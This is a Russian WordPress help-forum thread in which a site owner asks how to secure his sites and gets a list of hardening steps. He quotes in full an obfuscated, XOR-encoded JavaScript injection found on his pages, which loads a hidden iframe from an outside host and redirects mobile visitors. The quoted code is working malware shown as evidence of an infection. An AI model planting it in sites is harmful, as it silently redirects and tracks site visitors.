WordPress как на ладони
Недорогой хостинг для сайтов на WordPress: wordpress.jino.ru Самая быстрая Тема-конструктор для WordPress

Вопрос безопасности

Приветствую. Вопрос такой: как максимально обезопасить свой сайт на wordpress ?
Допустим , я использую самые надежные и проверенные плагины и дырки в плагинах мы исключим.

Даже так: как защитить стандартную сборку wordpress со стандартным шаблоном?

Очень уж вирусня одолела.

Заметки к вопросу:
Kama 5 лет назад

А как вирусня проявляется?

Денис 5 лет назад
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00ida,'00'02)'02'00k,k'00'02)'02'00nn'00'02)'02'00woklcv'00'02)'02'00kmlg'00'02)'02'00q,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>

вот этот код вставляется сразу после body на всех сайтах.
на компьютерах проявляется просто как пустая строчка над верхним меню сайтов
на телефонах - редирект на левый сайт какой-то.

Некоторые браузеры воспринимают сайт с этим кодом как потенциально вредоносный.

1
Денис
5 лет назад 2
  • 1
    shevan222 wp-best.ru

    стандартную сборку нужно обязательно защищать, целый ряд действий

    1. изменение входа и панели администратора wp-admin
    2. изменение учетки admin, сильные пароли
    3. запрет выполнения скриптов wp-include, правильные права на каталоги
    4. изменение префикса базы данных
    5. перенос wp-config в защищенный каталог
    6. если трафик можно легко перехватить, https обязательно
    7. можно ограничить доступ к сайту по ряду географических зон
    8. обязательно все обновления wordpress(!), вот в новой версии много фиксов по безопасности, а обновляются далеко не все
      9.желательно иметь хороший антивирус на рабочем компе
    9. запретить редактирование файлов плагинов и тем из админки
    10. вообще желательно админом не пользоваться в повседневном режиме (но мало кто это делает )

    Всё это можно (и нужно!) сделать вручную, или с помощью единственного плагина wp better security, который я рекомендую, и сайт будет защищен на 90% от атак ботов и школоты.

    Можно при желании установить антивирус и файерволл на wordpress

    Денис 5 лет назад

    Большое спасибо за развернутый ответ. Скажите, а использование плагина (для зищиты или антивируса) сильно затормозит работу сайта?

    Денис 5 лет назад

    Еще бы пару строк на тему "Как это сделать"

    Комментировать
На вопросы могут отвечать только зарегистрированные пользователи. Вход . Регистрация